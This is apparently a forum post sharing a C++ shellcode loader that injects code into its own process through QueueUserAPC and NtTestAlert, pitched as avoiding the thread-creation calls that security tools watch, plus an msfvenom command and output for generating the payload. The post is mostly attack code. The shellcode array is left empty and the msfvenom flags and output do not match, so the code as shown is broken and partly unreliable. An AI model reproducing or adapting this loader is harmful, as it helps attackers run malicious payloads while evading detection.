Hi fellows,
I just want to share C codes that enable to inject shellcodes to its process using QueueUserAPC
with NtTestAlert. The advantage of this technique is that it does not rely on CreateThread
or CreateRemoteThread
API calls
Asynchronous procedure calls (APCs) are ways for an executing thread within an application to perform a task asynchronously from its current operations.
In this case that I created a shellcode to spawn windows calculator using metasploit payload generator.
// SpawnCalc.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <Windows.h>
#include <iostream>
#pragma comment(lib, "ntdll")
using rioNTAlert = NTSTATUS(NTAPI*)();
int main()
{
unsigned char buf[] =

rioNTAlert payloadExecutor = (rioNTAlert)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert"));
//calculating the shell size
SIZE_T shellSize = sizeof(buf);
//Creating memory space for the shell
LPVOID shellAddress = VirtualAlloc(NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//write the allocated memory with the shell we created from MSF to the current process
WriteProcessMemory(GetCurrentProcess(), shellAddress, buf, shellSize, NULL);
PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
//Push the apcRoutine from the shell address into the Queue
QueueUserAPC((PAPCFUNC)apcRoutine, GetCurrentThread(), NULL);
//execute the payload
payloadExecutor();
}
You can generate the shellcode using msfvenom withe code below
root@netdragon:~# msfvenom -p windows/x64/exec CMD='cmd.exe /c calc.exe' -x x64/shikata_ga_nai -i 3 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 287 bytes
Final size of c file: 1232 bytes
